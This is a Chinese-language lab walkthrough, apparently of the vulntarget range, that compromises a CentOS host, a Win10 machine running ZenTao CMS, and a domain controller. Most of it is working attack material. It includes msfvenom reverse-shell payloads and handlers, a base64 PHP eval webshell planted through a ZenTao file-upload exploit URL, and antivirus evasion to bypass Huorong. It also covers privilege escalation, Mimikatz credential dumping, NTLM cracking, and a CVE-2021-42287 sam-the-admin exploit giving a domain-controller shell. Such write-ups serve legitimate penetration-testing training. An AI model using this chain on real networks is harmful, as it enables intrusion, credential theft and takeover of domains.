实际部署之后centos7 的ip有所变动分别是 :192.168.127.130以及10.0.20.30
Centos7
老规矩还是先用fscan扫一下服务和端口,找漏洞打
直接爆出来一个SSH弱口令…,上来就不用打了,什么意思???
直接xshell登入,生成一个MSF木马,然后上线。
上线MSF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.127.129 LPORT=8888 -f elf > mshell.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.127.129
set lport 8888
run
添加路由
run post/multi/manage/autoroute
看到另外一个网段
[!] * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.127.0/255.255.255.0 from host's routing table.
上传Fscan
直接使用msf的命令即可上传
upload /root/home/tools/fscan /tmp/
然后执行shell命令,获取centos的shell,(你可能会说,都有密码了,直接连接不行吗?害,应急做多了,老是会想到,ssh有记录。)
/usr/bin/script -qc /bin/bash /dev/null #获得交互式shell
然后执行,执行扫描的时候需要加上-np,因为win10的那一台机器开着防火墙,ping不通
cd /tmp
chmod +x fscan
./fscan -h 10.0.20.1/24 -np
执行结果,我把不相关的直接删除了,看重点即可。
[root@localhost tmp]# ./fscan -h 10.0.20.1/24 -np
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
10.0.20.66:3306 open
10.0.20.66:8080 open
[*] 扫描结束,耗时: 4m20.058335309s
发现内网有一个10.0.20.66并且开放了3306和8080端口,先看一下8080端口
WIN10
端口转发
将本地kali的8181端口转发给内网机器10.0.20.66的8080端口
portfwd add -l 8282 -p 8080 -r 10.0.20.66
这个时候直接访问kali的8282端口就能访问到10.0.20.66的8181端口了,主要是将centos给当跳板了。
访问了一下,发现是禅道CMS
账号和密码是弱口令: admin/Admin#123,看其他博主爆出来的,在后台可以看到版本信息,
这个版本存在一个漏洞:禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325,具体漏洞详情不多介绍,网上有很多例子。
禅道CMS
在centos中创建一个php🐎
echo PD9waHAgQGV2YWwoJF9QT1NUWydiJ10pOz8+ | base64 -d >> shell.php
然后用python开启一个http服务,centos内置python为python2版本,使用下面命令开启,确保shell.php在执行命令的目录内
python -m SimpleHTTPServer 7777
构造参数
HTTP://10.0.20.30:7777/shell.php
base64加密一下
SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=
最终的payload是
http://192.168.127.129:8282/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=
请求一下这个url,禅道会向刚刚开启的那个HTTP服务请求shell.php并且会保存到data\client\1目录中,所以🐎的地址为:http://192.168.127.129:8282/data/client/1/shell.php
连接成功,木马上线
MSF上线
生成一个反弹shell马,因为正向马过不去,关防火墙也没权限
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=7656 -f exe >7656.exe
使用蚁剑上传,神奇的一幕出现了,上传上去立马就没了,排查一下进程
tasklist
复制到进程识别工具中:https://tasklist.pdsec.top/
发现了火绒程序
免杀
这里直接使用掩日的免杀工具
这个使用起来特别简单,直接选择好MSF生成的🐎,然后点击生成就会生成一个绕过杀毒软件的木马
MSF启动监听,注意这个IP,不要再设置为kali的IP了
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.30
set lport 7656
run
然后在蚁剑的终端中运行那个木马程序,上线( ̄︶ ̄)↗
再进行一个进程迁移
run post/windows/manage/migrate
添加路由
run post/multi/manage/autoroute
发现一个10.0.10.0/255.255.255.0的网段
扫描内网
使用arp扫描一下10.0.10.0/255.255.255.0这个网段的主机
use post/windows/gather/arp_scanner
set rhosts 10.0.10.1-254
set session 3
run
在这一步发生了一件比较离谱的事情,每次扫描的时候,session都会掉
把火绒关了也是如此,所以我在想是不是有什么bug,于是我换了一种思路,直接上传一个fsca,然后用fscan扫,上传之前,我把火绒开启了,奇怪的是,火绒竟然没有杀掉,可能是规则库太老了。
老规矩还是加上-np参数
fscan.exe -h 10.0.10.1/24 -np
扫描结果
10.0.10.100:135 open
10.0.10.100:139 open
10.0.10.100:445 open
发现了一个10.0.10.100的主机,10.0.10.99是当前主机的IP,先进行一下主机信息收集吧
主机信息收集
通过ipconfig /all可以看到主DNS后缀,基本上可以判定当前主机为域用户
定位域控
直接使用nslookup解析域名,获得域控的IP,ip为10.0.10.100
抓取Hash
抓取Hash之前需要先提权一下,要不然抓不了
提权
直接使用MSF自带的功能即可
getsystem
抓取hash
load kiwi
creds_all
没有抓取到明文hash
去cmd5里面解析一下NTLM
解密如下
win101 admin#123
域控
CVE-2021-42287
由于Active Directory没有对域中计算机与服务器账号进行验证,经过身份验证的攻击者利用该漏洞绕过完全限制,可将域中普通用户权限提升为域管理员权限并执行任意代码
我们在win10中已经拿到了域成员的账号和密码:win101/admin#123
POC: https://github.com/WazeHell/sam-the-admin.git
搭建代理
运行这个POC之前需要先搭建一个代理,要不然访问不到
use auxiliary/server/socks_proxy
run
然后进行漏洞利用
proxychains python3 sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell
成功拿到域控的shell
思路
Centos没啥好说的,弱口令打的,Win10是禅道CMS打进去的,然后MSF上线,免杀用的是掩日的工具,添加路由,用CVE-2021-42287打的域控,脚本一把梭,妥妥的脚本小子一个了。
